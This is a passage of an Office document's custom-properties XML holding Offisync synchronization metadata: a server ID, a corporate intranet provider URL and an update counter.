  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="Offisync_ServerID">
    <vt:lpwstr>a14a2c2f-da46-4240-9725-91cb14d4c581</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="Offisync_ProviderInitializationData">
    <vt:lpwstr>https://intranet.paloaltonetworks.com</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="Offisync_UpdateToken">
    <vt:lpwstr>5</vt:lpwstr>
  </property>
</Properties>
</file>